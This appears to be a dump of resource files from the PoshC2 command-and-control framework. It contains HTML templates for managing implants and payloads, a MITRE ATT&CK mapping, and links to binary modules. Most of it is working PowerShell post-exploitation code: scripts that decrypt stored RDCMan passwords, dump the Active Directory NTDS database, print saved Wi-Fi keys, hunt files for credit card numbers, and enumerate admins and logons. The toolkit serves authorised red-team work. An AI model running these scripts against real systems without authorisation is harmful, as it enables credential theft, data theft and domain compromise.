https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/html-templates/include/img/logo-for-light.webp -------------------------------------------------------------------------------- /resources/html-templates/payloads.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
Payloads
5 |
6 |
7 |
8 | Upload new file: 9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | {% for image in images %} 25 | 26 | 27 | 30 | 37 | 38 | {% endfor %} 39 |
#PAYLOADACTION
{{loop.index}} 28 | {{image}} 29 | 31 | 32 | 35 | 36 |
40 |
41 |
42 | -------------------------------------------------------------------------------- /resources/html-templates/reports.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
Reports
5 |
6 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | {% for report in reports %} 19 | 20 | 21 | 24 | 31 | 32 | {% endfor %} 33 |
#REPORTACTION
{{loop.index}} 22 | {{report}} 23 | 25 | 26 | 29 | 30 |
34 |
35 |
36 | -------------------------------------------------------------------------------- /resources/html-templates/tasksview.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
Queued Tasks
5 |
6 |
7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | {% for task in new_tasks %} 18 | 19 | 20 | 21 | 22 | 23 | 30 | 31 | {% endfor %} 32 |
#IMPLANT IDCOMMANDUSERACTION
{{task.id}}{{task.implant_id}}{{task.command}}{{task.user}} 24 | 25 | 28 | 29 |
33 |
34 |
35 | -------------------------------------------------------------------------------- /resources/images/PoshC2Logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/images/PoshC2Logo.png -------------------------------------------------------------------------------- /resources/images/ReportLogo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/images/ReportLogo.png -------------------------------------------------------------------------------- /resources/images/firewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/images/firewall.png -------------------------------------------------------------------------------- /resources/images/implant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/images/implant.png -------------------------------------------------------------------------------- /resources/mitre-mapping.yml: -------------------------------------------------------------------------------- 1 | - command: "sharpservice" 2 | ttps: 3 | - id: "T1569.002" 4 | name: "System Services: Service Execution" 5 | tactics: 6 | - "Execution" 7 | 8 | - command: "steal-token" 9 | ttps: 10 | - id: "T1134.001" 11 | name: "Access Token Manipulation: Token Impersonation/Theft" 12 | tactics: 13 | - "Defense Evasion" 14 | - "Privilege Escalation" 15 | 16 | - command: "make-token" 17 | ttps: 18 | - id: "T1134.003" 19 | name: "Access Token Manipulation: Make and Impersonate Token" 20 | tactics: 21 | - "Defense Evasion" 22 | - "Privilege 
Escalation"

- command: "sharpcreateproc"
  ttps:
    - id: "T1134.003"
      name: "Access Token Manipulation: Make and Impersonate Token"
      tactics:
        - "Defense Evasion"
        - "Privilege Escalation"

- command: "sharpprocesslist"
  ttps:
    - id: "T1057"  # was "1057": every other entry carries the ATT&CK "T" prefix, and reports key on technique_id
      name: "Process Discovery"
      tactics:
        - "Discovery"

- command: "sharpwinrm"
  ttps:
    - id: "T1021.006"
      name: "Remote Services: Windows Remote Management"
      tactics:
        - "Lateral Movement"

- command: "user-logons"
  ttps:
    - id: "T1021"
      name: "Remote Services"
      tactics:
        - "Lateral Movement"
    - id: "T1033"
      name: "System Owner/User Discovery"
      tactics:
        - "Discovery"

- command: "grep"
  ttps:
    - id: "T1083"
      name: "File and Directory Discovery"
      tactics:
        - "Discovery"
    - id: "T1005"
      name: "Data from Local System"
      tactics:
        - "Collection"
--------------------------------------------------------------------------------
/resources/modules/CSharp-OracleClient.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/CSharp-OracleClient.exe
--------------------------------------------------------------------------------
/resources/modules/Certify.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Certify.exe
--------------------------------------------------------------------------------
/resources/modules/DNSResolve.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/DNSResolve.exe
-------------------------------------------------------------------------------- /resources/modules/Daisy.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Daisy.dll -------------------------------------------------------------------------------- /resources/modules/Decrypt-RDCMan.ps1: -------------------------------------------------------------------------------- 1 | function Decrypt-RDCMan ($FilePath) { 2 | <# 3 | .SYNOPSIS 4 | 5 | This script should be able to decrpt all passwords stored in the RDCMan config file 6 | 7 | Function: Decrypt-RDCMan 8 | Author:Ben Turner @benpturner, Rich Hicks @scriptmonkey_ 9 | 10 | .EXAMPLE 11 | 12 | Decrypt-RDCMan -FilePath 13 | #> 14 | if (!$FilePath) { 15 | [xml]$config = Get-Content "$env:LOCALAPPDATA\microsoft\remote desktop connection manager\rdcman.settings" 16 | $Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*" 17 | $Xml | select-object -ExpandProperty "Node"| % {Write-Output "Decrypting file: " $_.InnerText; Decrypt-RDCMan $_.InnerText} 18 | } else { 19 | [xml]$Types = Get-Content $FilePath 20 | 21 | $Xml = Select-Xml -Xml $Types -XPath "//logonCredentials" 22 | 23 | # depending on the RDCMan version we may need to change the XML search 24 | $Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password; $_.Domain + "\" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" } 25 | 26 | # depending on the RDCMan version, we may have to use search through the #text field in the XML structure 27 | $Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "\" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n"} 28 | } 29 | } 30 | 31 | function Decrypt-DPAPI ($EncryptedString) { 32 | # load the Security Assembly into the PS runspace 33 | Add-Type -assembly System.Security 34 | 
$encoding= [System.Text.Encoding]::ASCII 35 | $uencoding = [System.Text.Encoding]::UNICODE 36 | 37 | # try and decrypt the password with the CurrentUser Scope 38 | try { 39 | $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) 40 | $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) 41 | [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_} 42 | echo $myStr1 43 | } 44 | catch { 45 | # try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails 46 | try { 47 | $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) 48 | $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) 49 | [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_} 50 | echo $myStr1 51 | } 52 | catch { 53 | echo "Could not decrypt password" 54 | } 55 | } 56 | } 57 | 58 | 59 | -------------------------------------------------------------------------------- /resources/modules/Dump-NTDS.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Dumps the active directory dit using ntdsutil 4 | .DESCRIPTION 5 | Dumps the active directory dit using ntdsutil 6 | .EXAMPLE 7 | PS C:\>Dump-NTDS -EmptyFolder C:\Temp\NTDS\ 8 | #> 9 | function Dump-NTDS 10 | { 11 | [cmdletbinding()] 12 | Param 13 | ( 14 | [string[]]$EmptyFolder 15 | ) 16 | 17 | if( (Get-ChildItem $EmptyFolder | Measure-Object).Count -eq 0) 18 | { 19 | if (Test-Administrator) { 20 | NTdsutil.exe "activate instance ntds" "ifm" "create full $($EmptyFolder) " "q" "q" 21 | } else { 22 | Write-Output "Not running in elevated mode - must run as administrator" 23 | } 24 | } else { 25 | Write-Output "Folder is not empty, must 
use an empty folder" 26 | } 27 | 28 | Write-Output "If successfull, Zip the files and download using - New-ZipFile c:\temp\test.zip c:\temp\test\" 29 | } 30 | function Test-Administrator 31 | { 32 | $user = [Security.Principal.WindowsIdentity]::GetCurrent(); 33 | (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) 34 | } 35 | 36 | -------------------------------------------------------------------------------- /resources/modules/Echo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Echo.exe -------------------------------------------------------------------------------- /resources/modules/EventLogSearcher.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/EventLogSearcher.exe -------------------------------------------------------------------------------- /resources/modules/FComm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/FComm.exe -------------------------------------------------------------------------------- /resources/modules/FileGrep.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/FileGrep.exe -------------------------------------------------------------------------------- /resources/modules/Get-CreditCardData.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Searches recursively through the provided path searching for valid credit card numbers 4 | 
.DESCRIPTION 5 | Large files are read in chunks so as to not exhaust system resources 6 | .EXAMPLE 7 | PS C:\> Get-CreditCardData -Path C:\Backup\ 8 | #> 9 | 10 | Function Get-CreditCardData { 11 | 12 | param ( 13 | [string]$path = $(throw "-path is required";) 14 | ) 15 | 16 | #$Excel = New-Object -ComObject Excel.Application 17 | 18 | $REGEX = [regex]"(?im)(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})" 19 | $REGEX2 = [regex]"^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$" 20 | $REGEX3 = [regex]"[456][0-9]{15}","[456][0-9]{3}[-| ][0-9]{4} [-| ][0-9]{4}[-| ][0-9]{4}" 21 | 22 | Get-ChildItem -Rec -Exclude *.exe,*.dll $path -File | % { 23 | 24 | #if (($_.FullName -like "*xls") -or ($_.FullName -like "*.xlsx")){ 25 | #$Workbook = $Excel.Workbooks.Open($_.FullName) 26 | #If(($Workbook.Sheets.Item(1).Range("A:Z")) | Select-String -pattern $REGEX){ 27 | # $Workbook.Close($false) 28 | # Write-Output "[+] Potential Card data found:" $_.FullName -ForegroundColor green 29 | #} 30 | #} 31 | 32 | if ((Select-String -pattern $REGEX -Path $_.FullName -AllMatches).Matches.Count -gt 5 ) { 33 | Write-Output "[+] Potential Card data found:" $_.FullName -ForegroundColor green 34 | return 35 | } 36 | 37 | } 38 | 39 | } 40 | 41 | # Sample credit card data for testing 42 | #3782 8224 6310 0054 43 | #371449635398431 44 | #371449635398432 45 | #371449635398434 46 | #371449635398432 47 | #371449635398430 48 | #371449635398432 49 | -------------------------------------------------------------------------------- /resources/modules/Get-FirewallRules.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Returns all firewall rules 4 | .DESCRIPTION 5 | Returns all firewall rules 6 | .EXAMPLE 7 | PS C:\> Get-FirewallRule -Enabled $true | 
sort direction,applicationName,name 8 | .EXAMPLE 9 | PS C:\> Get-firewallRule -enabled $true | sort direction,applicationName,name | format-table -wrap -autosize -property Name, @{Label="Action"; expression={$Fwaction[$_.action]}},@{label="Direction";expression={ $fwdirection[$_.direction]}},@{Label="Protocol"; expression={$FwProtocols[$_.protocol]}}, localPorts,applicationname 10 | #> 11 | Function Get-FireWallRule 12 | { 13 | Param ( 14 | $Name, 15 | $Direction, 16 | $Enabled, 17 | $Protocol, 18 | $profile, 19 | $action, 20 | $grouping 21 | ) 22 | 23 | $Rules = (New-object -comObject HNetCfg.FwPolicy2).rules 24 | If ($name) { $rules= $rules | where-object {$_.name -like $name}} 25 | If ($direction) {$rules= $rules | where-object {$_.direction -eq $direction}} 26 | If ($Enabled) {$rules= $rules | where-object {$_.Enabled -eq $Enabled}} 27 | If ($protocol) {$rules= $rules | where-object {$_.protocol -eq $protocol}} 28 | If ($profile) {$rules= $rules | where-object {$_.Profiles -bAND $profile}} 29 | If ($Action) {$rules= $rules | where-object {$_.Action -eq $Action}} 30 | If ($Grouping) {$rules= $rules | where-object {$_.Grouping -Like $Grouping}} 31 | 32 | $rules 33 | 34 | } 35 | 36 | 37 | Function Get-FireWallRulesAll 38 | { 39 | 40 | Netsh.exe Advfirewall show allprofiles 41 | 42 | $spaces1 = " " * 71 43 | $spaces2 = " " * 64 44 | Get-FireWallRule -Enabled $true | sort name | ` 45 | format-table -property ` 46 | @{label="Name" + $spaces1 ; expression={$_.name} ; width=75}, ` 47 | @{label="Action" ; expression={$Fwaction[$_.action]} ; width=6 }, ` 48 | @{label="Direction" ; expression={$fwdirection[$_.direction]} ; width=9 }, ` 49 | @{label="Protocol" ; expression={$FwProtocols[$_.protocol]} ; width=8 }, ` 50 | @{label="Local Ports" ; expression={$_.localPorts} ; width=11}, ` 51 | @{label="Application Name" + $spaces2 ; expression={$_.applicationname} ; width=80} 52 | 53 | } 54 | -------------------------------------------------------------------------------- 
/resources/modules/Get-IPConfig.ps1: -------------------------------------------------------------------------------- 1 | # https://gallery.technet.microsoft.com/scriptcenter/IPConfig-all-cfe08dc0 2 | 3 | function Get-Ipconfig { 4 | 5 | $array= @() 6 | 7 | $wmi=Get-WmiObject win32_ComputerSystem 8 | 9 | $obj=New-Object PSObject 10 | 11 | $obj |Add-Member -MemberType NoteProperty -Name "ComputerName" $wmi.Name 12 | 13 | # Finding the Network Adapter and MAC Address, DHCP Server 14 | 15 | $wmi=Get-WmiObject win32_networkadapterconfiguration | where {$_.Ipenabled -Match "True"} 16 | $obj |Add-Member -MemberType NoteProperty -Name "IPAddress" $wmi.IPAddress 17 | $obj |Add-Member -MemberType NoteProperty -Name "NetworkAdapter" $wmi.description 18 | $obj |Add-Member -MemberType NoteProperty -Name "MACAddress" $wmi.macaddress 19 | $obj |Add-Member -MemberType NoteProperty -Name "DefaultGateway" $wmi.DefaultIPGateway 20 | $obj |Add-Member -MemberType NoteProperty -Name "DHCPServer" $wmi.DHCPServer 21 | $obj |Add-Member -MemberType NoteProperty -Name "DHCPEnabled" $wmi.DHCPEnabled 22 | $obj |Add-Member -MemberType NoteProperty -Name "SubnetMask" $wmi.IPSubnet 23 | $obj |Add-Member -MemberType NoteProperty -Name "DNSServer" $wmi.DnsServerSearchOrder 24 | $obj |Add-Member -MemberType NoteProperty -Name "WinsPrimaryServer" $wmi.WinsPrimaryServer 25 | $obj |Add-Member -MemberType NoteProperty -Name "WinsSecondaryServer" $wmi.WinsSecondaryServer 26 | $array +=$obj 27 | 28 | echo "[+] IPConfig " 29 | echo $array 30 | 31 | } 32 | -------------------------------------------------------------------------------- /resources/modules/Get-InjectedThreads.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Get-InjectedThreads.ps1 -------------------------------------------------------------------------------- /resources/modules/Get-LocAdm.ps1: 
-------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Returns members of the Local Admins group 4 | .DESCRIPTION 5 | Retrieves all computers from Active Directory and searches and returns the members of the Local Admins group 6 | .EXAMPLE 7 | PS C:\> Get-LocAdm 8 | 9 | #> 10 | Function Get-LocAdm 11 | { 12 | $DirSearcher = New-Object -TypeName DirectoryServices.DirectorySearcher -ArgumentList ([ADSI]'') 13 | $DirSearcher.Filter = '(objectClass=computer)' 14 | $Computers = $DirSearcher.Findall() 15 | Foreach ($Computer in $Computers) 16 | { 17 | $Path = $Computer.Path 18 | $Name = ([ADSI]"$Path").Name 19 | Write-Output -InputObject $Name 20 | Write-Output -InputObject 'Members of the Local Admins group' 21 | Write-Output -InputObject '=================================' 22 | $members = [ADSI]"WinNT://$Name/Administrators" 23 | $members = @($members.psbase.Invoke('Members')) 24 | $members | ForEach-Object -Process { 25 | $_.GetType().InvokeMember('Name', 'GetProperty', 26 | $null, $_, $null) 27 | } 28 | Write-Output -InputObject `n 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /resources/modules/Get-MSHotFixes.ps1: -------------------------------------------------------------------------------- 1 | function Get-MSHotFixes 2 | { 3 | <# 4 | .Synopsis 5 | Cmdlet to retrieve the installed Microsoft hotfixes 6 | .Description 7 | The cmdlet retrieves all installed Microsoft hotfixes using WMI, specifically Win32_QuickFixEngineering class 8 | Previously this was achieved by executing 'wmic qfe list' via Invoke-Expression, however this produced a pop-up window and Invoke-Expression could trigger various warnings or alerts. 
9 | 10 | Version 1.0 11 | 12 | .Example 13 | Get-MSHotfixes 14 | 15 | Description HotfixID caption InstalledOn 16 | ----------- -------- ------- ----------- 17 | Security Update KB3200970 http://support.microsoft.com/?kbid=3200970 18/11/2016 00:00:00 18 | Security Update KB3202790 http://support.microsoft.com/?kbid=3202790 17/11/2016 00:00:00 19 | Update KB3199986 http://support.microsoft.com/?kbid=3199986 03/11/2016 00:00:00 20 | Update KB2693643 02/11/2016 00:00:00 21 | Update KB3199209 http://support.microsoft.com/?kbid=3199209 18/10/2016 00:00:00 22 | Update KB3176936 http://support.microsoft.com/?kbid=3176936 24/08/2016 00:00:00 23 | 24 | Retrieve all installed hotfixes 25 | 26 | .Example 27 | Get-MSHotFixes | Where-Object -Property hotfixid -EQ KB3176936 28 | 29 | Description HotfixID caption InstalledOn 30 | ----------- -------- ------- ----------- 31 | Update KB3176936 http://support.microsoft.com/?kbid=3176936 24/08/2016 00:00:00 32 | 33 | Determine if a specific patch is installed for later versions of Powershell 34 | 35 | .Example 36 | Get-MSHotFixes | Where-Object {$_.hotfixid -eq "KB2852386"} 37 | Description HotfixID Caption InstalledOn 38 | ----------- -------- ------- ----------- 39 | Update KB2852386 http://support.microsoft.com/?kbid... 
14/11/2016 00:00:00 40 | 41 | This is for PowerShell v2.0 installed on Windows 7 42 | 43 | 44 | #> 45 | 46 | $hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering 47 | $hotfixes | Select-Object -Property Description, HotfixID, Caption,@{l="InstalledOn";e={[DateTime]::Parse($_.psbase.properties["installedon"].value,$([System.Globalization.CultureInfo]::GetCultureInfo("en-US")))}} | Sort-Object -Descending InstalledOn 48 | } 49 | -------------------------------------------------------------------------------- /resources/modules/Get-PassNotExp.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Identify accounts with passwords set not to expire 4 | .DESCRIPTION 5 | Searches Active Directory for user accounts that have the flag set to allow the password never to expire 6 | .EXAMPLE 7 | PS C:\> Get-PassNotExp 8 | #> 9 | function Get-PassNotExp 10 | { 11 | $strFilter = '(&(objectCategory=User)(userAccountControl:1.2.840.113556.1.4.803:=65536))' 12 | $objDomain = New-Object System.DirectoryServices.DirectoryEntry 13 | $objSearcher = New-Object System.DirectoryServices.DirectorySearcher 14 | $objSearcher.SearchRoot = $objDomain 15 | $objSearcher.PageSize = 1000 16 | $objSearcher.Filter = $strFilter 17 | $colProplist = 'name' 18 | Write-Output 'Users with Password set NOT to Expire' 19 | Write-Output '=====================================' 20 | foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)} 21 | $colResults = $objSearcher.FindAll() 22 | foreach ($objResult in $colResults) 23 | {$objItem = $objResult.Properties; $objItem.name} 24 | } 25 | -------------------------------------------------------------------------------- /resources/modules/Get-PassPol.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Retrieves the default active directory password policy 4 | .DESCRIPTION 5 | Retrieves the default active directory password policy 6 | 
.EXAMPLE 7 | PS C:\> Pass-Pol 8 | Output the default domain password policy 9 | #> 10 | function Get-PassPol 11 | { 12 | $domain = [ADSI]"WinNT://$env:userdomain" 13 | $Name = @{Name='DomainName';Expression={$_.Name}} 14 | $MinPassLen = @{Name='Minimum Password Length (Chars)';Expression={$_.MinPasswordLength}} 15 | $MinPassAge = @{Name='Minimum Password Age (Days)';Expression={$_.MinPasswordAge.value/86400}} 16 | $MaxPassAge = @{Name='Maximum Password Age (Days)';Expression={$_.MaxPasswordAge.value/86400}} 17 | $PassHistory = @{Name='Enforce Password History (Passwords remembered)';Expression={$_.PasswordHistoryLength}} 18 | $AcctLockoutThreshold = @{Name='Account Lockout Threshold (Invalid logon attempts)';Expression={$_.MaxBadPasswordsAllowed}} 19 | $AcctLockoutDuration = @{Name='Account Lockout Duration (Minutes)';Expression={if ($_.AutoUnlockInterval.value -eq -1) {'Account is locked out until administrator unlocks it.'} else {$_.AutoUnlockInterval.value/60}}} 20 | $ResetAcctLockoutCounter = @{Name='Reset Account Lockout Counter After (Minutes)';Expression={$_.LockoutObservationInterval.value/60}} 21 | $domain | Select-Object $Name,$MinPassLen,$MinPassAge,$MaxPassAge,$PassHistory,$AcctLockoutThreshold,$AcctLockoutDuration,$ResetAcctLockoutCounter 22 | } 23 | $PassPol = Get-PassPol 24 | Write-Output 'Domain Password Policy: ' 25 | Write-Output $PassPol 26 | -------------------------------------------------------------------------------- /resources/modules/Get-RecentFiles.ps1: -------------------------------------------------------------------------------- 1 | Function Get-RecentFiles { 2 | $obj = New-Object -ComObject WScript.Shell 3 | $Path = [System.Environment]::GetFolderPath('Recent') 4 | $files = Get-ChildItem -Path $Path | Sort-Object LastAccessTime | Select-Object -Last 50 5 | echo "" 6 | echo "[+] Get-RecentFiles" 7 | echo "" 8 | foreach ($file in $files) 9 | { 10 | $extn = [IO.Path]::GetExtension($file) 11 | if ($extn -eq ".lnk" ) 12 | { 13 | try { 14 
| $lnk = $file.versioninfo.filename 15 | $lnkfile = $obj.CreateShortcut($lnk).TargetPath 16 | if ($lnkfile) { 17 | echo $lnkfile 18 | } 19 | } catch {} 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /resources/modules/Get-UserInfo.ps1: -------------------------------------------------------------------------------- 1 | function Get-UserInfo 2 | { 3 | Get-WmiObject win32_operatingsystem | select csname, @{LABEL='LastBootUpTime';EXPRESSION={$_.ConverttoDateTime($_.lastbootuptime)}} 4 | $arr = @() 5 | $Users = Get-WmiObject -Query "Select * from Win32_UserAccount Where LocalAccount = True" 6 | echo "" 7 | echo "======================" 8 | echo "Local Users" 9 | echo "======================" 10 | foreach ($usr in $Users) { 11 | $usr.Name 12 | } 13 | $GroupNames = Get-WmiObject -Query "SELECT * FROM Win32_Group Where LocalAccount = True" 14 | echo "" 15 | echo "======================" 16 | echo "Local Groups" 17 | echo "======================" 18 | foreach ($grp in $GroupNames) { 19 | $grp.Name 20 | } 21 | 22 | $hostname = (Get-WmiObject -Class Win32_ComputerSystem).Name 23 | echo "" 24 | echo "======================" 25 | echo "Members of Local Groups" 26 | echo "======================" 27 | 28 | foreach ($Group in $GroupNames) { 29 | $GroupName = $Group.Name 30 | $wmi = Get-WmiObject -Query "SELECT * FROM Win32_GroupUser WHERE GroupComponent=`"Win32_Group.Domain='$Hostname',Name='$GroupName'`"" 31 | 32 | if ($wmi -ne $null) 33 | { 34 | foreach ($item in $wmi) 35 | { 36 | $data = $item.PartComponent -split "\," 37 | $domain = ($data[0] -split "=")[1] 38 | $name = ($data[1] -split "=")[1] 39 | $arr += ("$domain\$name").Replace("""","") 40 | [Array]::Sort($arr) 41 | } 42 | } 43 | if ($arr.Count -gt 0) { 44 | echo "" 45 | echo $GroupName 46 | echo "======================" 47 | echo $arr 48 | } 49 | $arr = @() 50 | } 51 | } 52 | -------------------------------------------------------------------------------- 
/resources/modules/Get-UserLogons.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Gets User Logon Events 4 | 5 | Author: @m0rv4i 6 | 7 | .DESCRIPTION 8 | 9 | Lists User Logon Events from an event log and lists them with timestamps and from which hostname. 10 | 11 | Events where the hostname is '-' and machine logon events are excluded. 12 | 13 | .PARAMETER Newest 14 | 15 | Check the newest X events. Defaults to 200. 16 | 17 | .PARAMETER ComputerName 18 | 19 | Computername to run against using PSRemoting. Defaults to local host. 20 | 21 | .PARAMETER ExclusionList 22 | 23 | Account names to exclude. Defaults to "SYSTEM", "NETWORK SERVICE", "DWM-1", "LOCAL SERVICE", "UMFD-0", "UMFD-1". 24 | 25 | .PARAMETER ServiceAccounts 26 | 27 | Whether to include service accounts or not. Defaults to false. 28 | Service accounts are accounts starting with SVC_, SVC-, svc_ or svc-. 29 | 30 | .EXAMPLE 31 | 32 | PS C:\> Get-UserLogons 33 | 34 | 2020-08-17 10:52:40 : BEEROCLOCK\bob -> BEEROCLOCK 35 | 2020-08-17 10:52:40 : BEEROCLOCK\bob -> BEEROCLOCK 36 | 2020-08-14 19:00:48 : BEEROCLOCK\bob -> BEEROCLOCK 37 | 2020-08-14 19:00:48 : BEEROCLOCK\bob -> BEEROCLOCK 38 | 2020-08-12 21:00:05 : BEEROCLOCK\bob -> BEEROCLOCK 39 | 2020-08-12 21:00:05 : BEEROCLOCK\bob -> BEEROCLOCK 40 | 41 | .EXAMPLE 42 | 43 | PS C:\> Get-UserLogons -Newest 20000 -ServiceAccounts -ComputerName DC01.DOMAIN.LOCAL 44 | 45 | .EXAMPLE 46 | 47 | PS C:\> $exclusions = $("SYSTEM", "NETWORK SERVICE", "DWM-1", "LOCAL SERVICE", "UMFD-0", "UMFD-1", "ACCOUNT1", "ACCOUNT2") 48 | PS C:\> Get-UserLogons -ServiceAccounts -ComputerName DC01.DOMAIN.LOCAL -ExclusionList $exclusions 49 | 50 | #> 51 | function Get-UserLogons() 52 | { 53 | [CmdletBinding()] 54 | Param 55 | ( 56 | [string[]]$ExclusionList = $("SYSTEM", "NETWORK SERVICE", "DWM-1", "LOCAL SERVICE", "UMFD-0", "UMFD-1"), 57 | [int]$Newest = 200, 58 | [switch]$ServiceAccounts = $false, 59 | [string]$ComputerName = 
"" 60 | ) 61 | 62 | Write-Output "" 63 | 64 | if($ComputerName) 65 | { 66 | $LogonEvents = Get-EventLog -newest $Newest -logname security -instanceid 4624 -ComputerName $ComputerName 67 | } 68 | else 69 | { 70 | $LogonEvents = Get-EventLog -newest $Newest -logname security -instanceid 4624 71 | } 72 | 73 | foreach($Events in $LogonEvents) 74 | { 75 | 76 | $LogonUsername = $Events.ReplacementStrings[5] 77 | $LogonHostname = $Events.ReplacementStrings[11] 78 | $LogonDomain = $Events.ReplacementStrings[6] 79 | 80 | if($ExclusionList -contains $LogonUsername) 81 | { 82 | continue 83 | } 84 | 85 | if($LogonHostname -eq "-") 86 | { 87 | continue 88 | } 89 | 90 | if($LogonUsername.Trim("`$") -eq $LogonHostname) 91 | { 92 | continue 93 | } 94 | 95 | if(!$ServiceAccounts) 96 | { 97 | if($LogonUsername.ToLower().StartsWith("svc_") -or $LogonUsername.ToLower().StartsWith("svc-")) 98 | { 99 | continue 100 | } 101 | } 102 | 103 | Write-Output "$($Events.TimeGenerated.ToString("yyyy-MM-dd HH:mm:ss")) : $LogonDomain\$LogonUsername -> $LogonHostname" 104 | 105 | } 106 | } 107 | -------------------------------------------------------------------------------- /resources/modules/Get-WLANPass.ps1: -------------------------------------------------------------------------------- 1 | function Get-WLANPass 2 | { 3 | <# 4 | .Synopsis 5 | Retrives password from stored wlan profiles 6 | .DESCRIPTION 7 | Retrives password from stored wlan profiles 8 | .EXAMPLE 9 | PS C:\> Get-WLANPass 10 | Output stored WLAN Profile passwords 11 | #> 12 | $netsh = (netsh wlan show profiles) 13 | $netsh | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize 14 | } 15 | -------------------------------------------------------------------------------- 
/resources/modules/GetCreds.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/GetCreds.exe -------------------------------------------------------------------------------- /resources/modules/GetInstallerInfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/GetInstallerInfo.exe -------------------------------------------------------------------------------- /resources/modules/IPConfigCS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/IPConfigCS.exe -------------------------------------------------------------------------------- /resources/modules/InternalMonologue.exe: -------------------------------------------------------------------------------- 